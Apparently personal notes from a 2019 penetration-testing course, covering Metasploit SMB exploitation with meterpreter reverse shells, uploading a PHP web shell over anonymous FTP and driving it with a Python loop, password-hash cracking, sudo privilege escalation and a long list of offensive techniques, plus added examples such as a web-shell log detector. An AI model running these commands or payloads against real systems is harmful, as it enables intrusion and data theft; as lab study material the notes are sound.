Product: ISR4221-SEC/K9      Description: Cisco ISR 4221 SEC Bundle with SEC lic
Product: CON-SNT-ISR4221S    Description: SNTC-8X5XNBD Cisco ISR 4221 SEC B
Cisco Catalyst 3850-48 Switch with K9 IOS and 1 year SmartNet
ASA 5516-X with FirePOWER Services, 1 year SmartNet

=============================================================================================
=============================================================================================
09.01.2019

pen test?
before the pen test:
- understanding OSs (not only Windows and Linux)
- services - vector of attack
- attack methods
red team    - find the vulnerabilities
blue team   - fix the vulnerabilities
purple team - mixed
pen test... means capture the flag
white box, black box, grey box
SCADA systems, Aurora generator
stage zero - understand the needs of that business

passwd, shadow
sudo unshadow /etc/passwd /etc/shadow
crack the hash
--------
ftp, http 8080
vector of attack: anonymous login on ftp
vsftpd 2.3.4 - Backdoor Command Execution
upload some shell script
hide a file
ls command, find the file
-----------------------------
msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > show options
msf5 auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 172.16.60.142
msf5 auxiliary(scanner/smb/smb_enumshares) > set THREADS 10
msf5 auxiliary(scanner/smb/smb_enumshares) > run

msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set SMBUser <user>
msf5 auxiliary(scanner/smb/smb_login) > set SMBPass <pass>
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 172.16.60.1/24
msf5 auxiliary(scanner/smb/smb_login) > set THREADS 30
msf5 auxiliary(scanner/smb/smb_login) > run

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set SMBUser <user>
msf5 exploit(windows/smb/psexec) > set SMBPass <pass>
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set LHOST 172.16.65.132
msf5 exploit(windows/smb/psexec) > set RHOST 172.16.60.73

msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 172.16.60.87
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 172.16.60.77
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

bitsadmin, certutil

=============================================================================================
=============================================================================================
06.02.2019

OSCP cert
CEH cert
CTF Capture the flag
CISSP certification

Topic: misconfiguration
bad habits: leaving paths in place
ex. /var/www/html - public folder
    /etc/apache2  - Apache config
vulnerability: file permissions wrongly configured
https://dokuwiki.pejaime.com/lib/exe/fetch.php?media=dardan:f5:ms17-010-eternalblue7-2.pdf

=============================================================================================
=============================================================================================
08.02.2019

nmap -sU -p 161 172.16.15.15
snmpwalk -v 1 -c public <target ip>
msf5 > use auxiliary/scanner/snmp/snmp_enum
msf5 > use auxiliary/scanner/snmp/snmp_enumshares
msf5 > use auxiliary/scanner/snmp/snmp_enumusers
msf5 > use auxiliary/scanner/snmp/cisco_config_tftp
msf5 > use auxiliary/scanner/snmp/cisco_upload_file

=============================================================================================
=============================================================================================
11.02.2019

Information Gathering

Passive
most important process of hacking
done through 3rd parties; going directly at the target is not recommended
- whois, tool and database
- archive.org
- theHarvester
- recon-ng
- job portals, get info about systems from job descriptions
- google hacking

Active
- dumpster diving
- google hacking (dorks)
- dns recon, get the domain from the IP
- shodan
-----------------------------
domain, subdomain, *domain extension .com .net
-----------------------------
Phase 2, direct: vector of attack

# pip2 install shodan
www.shodan.io - register on shodan.io with a temp mail
root@kali:~# shodan init <your-shodan-api-key>
search on shodan.io:
  country:"al" port:"445" os:"windows"
search by ISP: ISP:"Kujtesa"
shodan cli:
# shodan host 84.22.59.42
----------------------------------------------------------------
Weevely
Usage: weevely generate
       weevely [cmd]
# git clone https://github.com/epinna/weevely3.git
/weevely3# python weevely.py generate 123 ~/Desktop/tt.php
mv tt.php to /var/www/html
python weevely.py http://172.16.65.98/tt.php 123
# scp file.php user@172.16.65.98:/home/userhome/    ### transfer from kali to the ubuntu apache2 server

=============================================================================================
=============================================================================================
13.02.2019

OSINT Frameworks
https://osintframework.com/
Information Gathering, domain: ickosovo.com
- Red Hawk
- Th3inspector
- BadKarma - Advanced Network Reconnaissance Toolkit
- DMitry - Deepmagic Information Gathering Tool
- Devploit - Information Gathering Tool
https://www.geocreepy.com/

=============================================================================================
=============================================================================================
18.02.2019

nessus scan
dradis - upload the exported nessus db to generate reports, http://localhost:3000
cat file.csv | grep "172.16.1" | cut -d "," -f 5 | sort -u
nmap -p- -iL filename                         --- to scan from a list
nmap -iL filename --exclude 172.16.1.204      --- to exclude from the result
nmap -p- ip/24 >> scan_result
nmap -p 21,22,23 ip/24 >> scan_result         --- specific scan
nmap -p- 172.16.1.19                          --- 554 rtsp found, install vlc
Metasploit web UI https://localhost:3790/   login: asdf / 12345@tmp

=============================================================================================
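The `cut -d "," -f 5` pipeline in the 18.02.2019 notes breaks as soon as a quoted field before the Host column contains a comma (Nessus quotes every field). Added example, not from the original notes: parse the export with a real CSV reader, list unique hosts in a prefix (with an exclude list like nmap --exclude) and group findings per host by Risk. The sample CSV is constructed and assumes the default Nessus column order, with Host as the fifth column.

```python
import csv
import io
from collections import defaultdict

# Constructed sample of a Nessus CSV export (assumption: default export layout,
# "Host" is the fifth column, matching the cut -f 5 in the notes).
# The MS17-010 row has a comma inside its quoted CVE field; cut -f 5 would
# return "Critical" for it instead of the host, the CSV reader gets it right.
SAMPLE_CSV = '''"Plugin ID","CVE","CVSS","Risk","Host","Protocol","Port","Name","Synopsis"
"11219","","","None","172.16.1.19","tcp","554","Nessus SYN scanner","open port"
"42873","","4.3","Medium","172.16.1.19","tcp","443","SSL Medium Strength Cipher Suites Supported (SWEET32)","weak ciphers"
"97833","CVE-2017-0143, CVE-2017-0144","9.3","Critical","172.16.1.204","tcp","445","MS17-010: Security Update for Microsoft Windows SMB Server","SMB RCE"
"10107","","","None","172.16.2.5","tcp","80","HTTP Server Type and Version","banner"
'''

RISK_ORDER = {"Critical": 0, "High": 1, "Medium": 2, "Low": 3, "None": 4}

def load_findings(text):
    """Parse a Nessus CSV export into a list of dicts keyed by the header row."""
    return list(csv.DictReader(io.StringIO(text)))

def hosts_in_prefix(findings, prefix, exclude=()):
    """Unique hosts whose address starts with prefix (use a trailing dot so
    172.16.1. does not also match 172.16.10.x), minus the excluded ones."""
    return sorted({f["Host"] for f in findings
                   if f["Host"].startswith(prefix) and f["Host"] not in exclude})

def findings_by_host(findings, min_risk="Low"):
    """Group (risk, port, name) per host, dropping informational rows below min_risk."""
    grouped = defaultdict(list)
    for f in findings:
        if RISK_ORDER.get(f["Risk"], 9) <= RISK_ORDER[min_risk]:
            grouped[f["Host"]].append((f["Risk"], f["Port"], f["Name"]))
    for host in grouped:
        grouped[host].sort(key=lambda t: RISK_ORDER[t[0]])  # most severe first
    return dict(grouped)

if __name__ == "__main__":
    rows = load_findings(SAMPLE_CSV)
    print("hosts:", hosts_in_prefix(rows, "172.16.1.", exclude={"172.16.1.204"}))
    for host, items in findings_by_host(rows).items():
        print(host)
        for risk, port, name in items:
            print(f"  [{risk}] {port}/tcp {name}")
```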
=============================================================================================
20.02.2019

to identify the file "what"
target 172.16.65.165
$ strings what            ### to understand if it is an archive
hint1: formula for TNT
# gzip what
$ gzip -d what.gz
$ file what
what: OpenDocument Text

=============================================================================================
=============================================================================================
22.02.2019
Cryptography

==SYMMETRIC==
scytale of Sparta
symmetric = encrypt and decrypt with the same key
Kerckhoffs: even when the algorithm is known (e.g. RSA, AES), the key stays secret
## substitution ciphers --- you must know the logic/algorithm of the table
a -> k
b -> d
c -> n
AES-256 = quantum proof, it takes millions of years
-----------------------------------------------------
## letter frequency analysis
E 13%
T 9%
A 8%
QU
-----------------------------------------------------
## Caesar (shift) cipher
shift ABCDEF...XYZ
-----------------------------------------------------
## Affine cipher
shift plus multiplier
E(x) = (A*x + B) mod 26
Euclidean algorithm (to find the inverse of A for decryption)
-----------------------------------------------------
## Vigenere cipher
-----------------------------------------------------
## stream cipher & block cipher
stream cipher: we encrypt bits
A5/1, RC4
TRNG, PRNG, middle square method, seed
### block cipher
we encrypt blocks
DES - 16 rounds, key whitening
Shannon (confusion & diffusion)
AES, ECB, CBC

=============================================================================================
=============================================================================================
25.02.2019

/var/log/proftpd# tail -f /var/log/proftpd.log                               --- real time log
/var/log/apache2# tail -f access.log                                         --- real time log
iptables -L --line-numbers                                                   --- view with line numbers
iptables -D INPUT 3                                                          --- to delete a rule by line number
iptables -A INPUT -s 172.16.65.153 -p tcp --destination-port 80 -j DROP      --- to add a rule
iptables -D INPUT -s 172.16.65.153 -p tcp --destination-port 80 -j DROP      --- to delete the rule
# netstat -naop | grep ESTABLISHED
# kill -9 1475
# lsof -n -i                                                                 --- view all connections
arp -a                                                                       --- to see the IPs
the IPs were changed, our IPs were cloned
the screen process was hijacked
ssh user@ip

=============================================================================================
=============================================================================================
27.02.2019

Target 172.16.65.136
# nmap 172.16.65.136
21/tcp open ftp
22/tcp open ssh
80/tcp open http
# nmap -sV 172.16.65.136
80/tcp open http  Apache httpd 2.4.29 ((Ubuntu))
21/tcp open ftp   ProFTPD 1.3.5e
22/tcp open ssh   OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
# dirb http://172.16.65.136
msf > search ProFTPD 1.3.5e
# cd /usr/share/webshells/php/
root@kali:/usr/share/webshells/php# cp simple-backdoor.php dani.php
# ftp 172.16.65.136          user/pass: anonymous/anonymous
ftp> cd /var/www/html/
ftp> put dani.php
http://172.16.65.136/dani.php
http://172.16.65.136/dani.php?cmd=<the command we want to execute>

nano ftp.py   (Python 3; the original was Python 2 with raw_input and the print statement)
    import requests

    # interactive loop: read a command, send it to the uploaded web shell, print the response
    # (params= URL-encodes the command, so spaces and slashes survive)
    while True:
        cmd = input("> ")
        r = requests.get("http://172.16.65.136/simple-backdoor.php", params={"cmd": cmd})
        print(r.text)
python3 ftp.py

$ ssh anonymous@172.16.65.136     (password: anonymous)
anonymous@digitalschool:/home/drinor$ cat .bash_history
$ ssh drinor@172.16.65.136        (password: Retro1)
$ sudo su
[sudo] password for drinor: Retro1
root@digitalschool:/home/drinor# :)

=============================================================================================
=============================================================================================
01.03.2019
LAB: the hosts to try to hack

=============================================================================================
=============================================================================================
04.03.2019

Build AdminFinder.py, Wget.py, /cget.exe
we got access; to keep persistence only port 22 is open, what do we do?
add user: useradd            / does not create the home dir
          in /etc/passwd they have /home but no /bin/bash
---------------------------------------
Backdoors|malware for specific systems:
- /usr/share/webshells/: asp aspx cfm jsp perl php
- $ service apache2 status
---------------------------------------
web media files: how to automate grabbing all the files at once
>>> wget.download('http://127.0.0.1/all.zip')

=============================================================================================
=============================================================================================
06.03.2019
Build Utilman

=============================================================================================
=============================================================================================
11.03.2019
exam complexity: recruite --- level 1
Flag on 10.20.20.13 via SMB: CA1{7SEkYLPrxEdvRcR}

=============================================================================================
=============================================================================================
Final EXAM
Saturday 10:00 27.04 until Sunday 9:59 28.04
lab - complexity for 24 hours
10 - 11 machines
pivoting
web
"no support from one another"
before the exam: study, set up the machine and tools
john the ripper -- be sure it is the latest version

=============================================================================================
=============================================================================================
15.03.2019

Target: 65.136 (Voyager)
mkdir Voyager Files
nmap 172.16.65.136 -p-                       # only open ports
nmap -sS -sV -p22,80,2020 172.16.65.136
--- results here ---
http://172.16.65.136:2020   method not allowed
http://172.16.65.136        there is a photo, mmmm
view source code - nothing :(
is there a directory? dirb or gobuster --- nothing, only the image folder
http://172.16.65.136/img    ----- there are some imgs
mkdir img
wget http://172.16.65.136/img/1.jpeg, 2.jpeg, 3.jpeg   --- to download
steghide info 1.jpg
steghide info 2.jpg         --- mm, there is something in it
steghide extract -sf 2.jpg  --- to extract
# ls                        --- there is a .py file extracted
nano voyager.py
Flask --- the lib is in there; it accepts POST requests; the requester needs to send an image/file
18:42:46 --- commenting voyager.py
id
ps -aux
linenum
2 users: john, bon
base64 /home/john/cred -w 0   --- to grab the file as base64, then extract it
# file cred
cred: OpenDocument
# libreoffice cred            --- requires a password
john the ripper is used here
john.pot --- here it keeps the hashes cracked once
# sudo ./john xxx             --- finds the password of cred
with that user and pass try the web login
ssh john@172.16.65.136
nano voyager.conf
sudo -l
sudo /usr/bin/lib/

IDS bypass scan methods: idle scan, fragmented scan
the IDS notices nmap scans
DT - deception technology, ex. honeypot
snort - IDS
splunk - log aggregator, plus pattern builder
elasticsearch --- runs on a NoSQL database, very fast
AlienVault
Carbon Black
Silence endpoint protection - on cloud - scalability - quarantines the infected host

=============================================================================================
=============================================================================================
20.03.2019

sudo tcpdump net 10.0.20.0/24 -w logs.txt     (-w writes a binary pcap file, not text)
Target: 172.16.65.123
nmap 172.16.65.123
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-20 12:53 EDT
Nmap scan report for 172.16.65.123
Host is up (0.0099s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5357/tcp  open  wsdapi
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

=============================================================================================
=============================================================================================
25.03.2019

target 172.16.65.73
nmap 172.16.65.73
nmap -sS -sV -p80 172.16.65.73
dirb http://172.16.65.73
echo xxxxxxx | base64 -d
http://172.16.65.73/armageddon    --- gives us a private key
nano ssh-key                      --- paste the key
chmod 600 ssh-key
ssh -i ssh-key armageddon@172.16.65.73    > :)
# sudo -l
User armageddon may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/python
nano shell.py
    import os

    # python itself runs as root under sudo, so the shell it spawns is root
    os.system('sudo su')
# sudo /usr/bin/python shell.py
# root :)

=============================================================================================
=============================================================================================
27.03.2019
Build netcat with malware included which will provide a session

=============================================================================================
=============================================================================================
29.03.2019

snmpwalk
nikto
wpscan
creddump
smbrelay
netntlmex.py
fingerprint.py
impacket
pth (pass the hash)
load incognito ---- command
proxychains, socks4a
dex2jar, apktool, apksign
tcpdump, wireshark
curl_user
local exploit ms12_020 ------- exploit rdesktop
folder/file sharing
domain hashdump with shadow copy ------------------------
concept: dll injection with msfvenom --------------------------- malicious dll
subdomain bruteforce with wisler -----------------------
cloudflare bypass
nslookup, reverse lookup
domain queries with the net command
fileless attacks with regsvr32
serveo.net port forwarding
ssh, sshuttle port forwarding
plink port forwarding
ssh, sshuttle tunneling
plink ssh tunnel
burp
captcha bypass
sql injection with sqlmap
cmd to sqlmap
event log cleaner
alternate data streams
cron jobs, task scheduler, reg add
obfuscation
base32/64 encode decode
esbsb encryption decryption
steghide with the whole package
pop3 brute force
snmp public and private string bruteforce
xhydra, hydra, medusa, ncrack
netcat and nc file transfer
netcat and nc
bypass uac
ask injection
local exploits (metasploit)
autoroute and static route
reverse engineering: immunity debugger, ollydbg
ransomware: symmetric encryption; reverse ransomware
local authentication bypass: cmd sticky keys injection
linux init injection
show mount (metasploit)
enum filezilla_server, enum outlook, enum skype
export firefox history and data, export chrome history and data, decrypt saved passwords
privilege escalation with wget, cat, vim and vi, python hooks, pip, find
kernel exploit
gcc compiler, g++ compiler
uncompile 6
apache virtual host, nginx
mod_ssl, mod_security
php shell, perl shell, asp/aspx shell, weevely 3
smb client
finger protocol
smtp relay
thc ipv6 attack, thc ssl attack
slowloris, slow http test
pyinstaller, wine32/64, golang
metasploit persistence
bitsadmin, powershell url download, certutil
unicorn
etherape, promiscuous mode, macchanger, big mac attack
rogue access point
iot default creds
rtsp access with vlc
john the ripper, hashcat
wordpress bruteforce with hashcat mode -m 400 and -m 500
joomlascan ----------- tool
drupal enumeration
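Worked example for the affine cipher and letter-frequency notes of 22.02.2019 (E(x) = (A*x + B) mod 26, Euclidean algorithm). This is an added example, not code from the course or the original notes: the extended Euclidean algorithm gives the inverse of A needed to decrypt, and the frequency table (E, T as the most common English letters) is used to recover the key from ciphertext alone, which goes one step beyond the notes. The plaintext pair "ET" used for the key guess is an assumption about the language of the message.

```python
import string
from collections import Counter

ALPHABET = string.ascii_uppercase
M = 26  # alphabet size; A must be coprime with 26 (odd and not 13) or the cipher is not invertible

def egcd(a, b):
    """Extended Euclidean algorithm: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = egcd(b, a % b)
    return g, y, x - (a // b) * y

def mod_inverse(a, m=M):
    """Inverse of a mod m from the extended Euclidean algorithm; ValueError if gcd(a, m) != 1."""
    g, x, _ = egcd(a % m, m)
    if g != 1:
        raise ValueError(f"{a} has no inverse mod {m}")
    return x % m

def affine_encrypt(text, a, b):
    """E(x) = (A*x + B) mod 26 on letters; other characters pass through unchanged."""
    mod_inverse(a)  # fail early on a non-invertible key such as A=2 or A=13
    return "".join(ALPHABET[(a * ALPHABET.index(c) + b) % M] if c in ALPHABET else c
                   for c in text.upper())

def affine_decrypt(text, a, b):
    """D(y) = A^-1 * (y - B) mod 26, using the inverse computed by egcd."""
    inv = mod_inverse(a)
    return "".join(ALPHABET[(inv * (ALPHABET.index(c) - b)) % M] if c in ALPHABET else c
                   for c in text.upper())

def letter_frequencies(text):
    """Relative frequency of each letter, most common first (English: E ~13%, T ~9%, A ~8%)."""
    letters = [c for c in text.upper() if c in ALPHABET]
    counts = Counter(letters)
    return [(c, n / len(letters)) for c, n in counts.most_common()]

def guess_affine_key(ciphertext, plain_pair="ET"):
    """Recover (A, B) assuming the two most frequent ciphertext letters stand for E and T:
    from y1 = A*x1 + B and y2 = A*x2 + B follows A = (y1 - y2) * (x1 - x2)^-1 mod 26."""
    (y1, _), (y2, _) = letter_frequencies(ciphertext)[:2]
    x1, x2 = (ALPHABET.index(p) for p in plain_pair)
    a = ((ALPHABET.index(y1) - ALPHABET.index(y2)) * mod_inverse(x1 - x2)) % M
    b = (ALPHABET.index(y1) - a * x1) % M
    return a, b
```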
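Defender-side counterpart to the 25.02.2019 log monitoring notes (tail -f access.log) and the 27.02.2019 exercise, where a PHP web shell is driven through a ?cmd= parameter from a requests loop. Added example, not from the original notes: parse Apache combined-format lines and flag requests whose command-style parameter carries a shell command, counting hits per source IP. The log lines are constructed, and the parameter names and command tokens watched for are assumptions to tune per site.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache combined log format: ip ident user [time] "METHOD path HTTP/x" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
                    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<agent>[^"]*)"')

# Query parameters typically used by simple PHP web shells (the notes' shell uses ?cmd=); assumption
SHELL_PARAMS = {"cmd", "exec", "command", "c"}
# Commands a web application would not normally receive in a query string; assumption
SUSPICIOUS_TOKENS = re.compile(r'\b(id|whoami|uname|cat|ls|nc|wget|curl|bash|sh|python)\b')

# Constructed sample lines (not real traffic): one ordinary visitor, then a web-shell client loop
SAMPLE_LOG = """\
172.16.65.150 - - [27/Feb/2019:10:01:03 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.16.65.150 - - [27/Feb/2019:10:01:04 +0100] "GET /img/1.jpeg HTTP/1.1" 200 30211 "http://172.16.65.136/" "Mozilla/5.0"
172.16.65.153 - - [27/Feb/2019:10:05:41 +0100] "GET /dani.php?cmd=id HTTP/1.1" 200 87 "-" "python-requests/2.21.0"
172.16.65.153 - - [27/Feb/2019:10:05:49 +0100] "GET /dani.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 2310 "-" "python-requests/2.21.0"
172.16.65.153 - - [27/Feb/2019:10:06:02 +0100] "GET /dani.php?cmd=ls%20-la%20/var/www/html HTTP/1.1" 200 640 "-" "python-requests/2.21.0"
"""

def parse_line(line):
    """Fields of one combined-format line as a dict, or None if the line does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def shell_commands(path):
    """Decoded values of shell-style parameters in the request path (empty list if none)."""
    qs = parse_qs(urlsplit(path).query)  # parse_qs already percent-decodes the values
    return [v for k, vs in qs.items() if k.lower() in SHELL_PARAMS for v in vs]

def detect_webshell(log_text):
    """Return (alerts, hits): one alert per request whose cmd-style parameter looks like a
    shell command, as (ip, script path, command, user agent), and a hit count per source IP."""
    alerts, hits = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for cmd in shell_commands(rec["path"]):
            if SUSPICIOUS_TOKENS.search(cmd):
                hits[rec["ip"]] += 1
                alerts.append((rec["ip"], urlsplit(rec["path"]).path, cmd, rec["agent"]))
    return alerts, hits

if __name__ == "__main__":
    found, per_ip = detect_webshell(SAMPLE_LOG)
    for ip, script, cmd, agent in found:
        print(f"{ip} -> {script} cmd={cmd!r} agent={agent}")
    print("hits per IP:", dict(per_ip))
```

Run against a live server the same logic fits a `tail -f access.log` pipe; a burst of hits from one IP with a non-browser user agent, as in the sample, is the pattern to alert on.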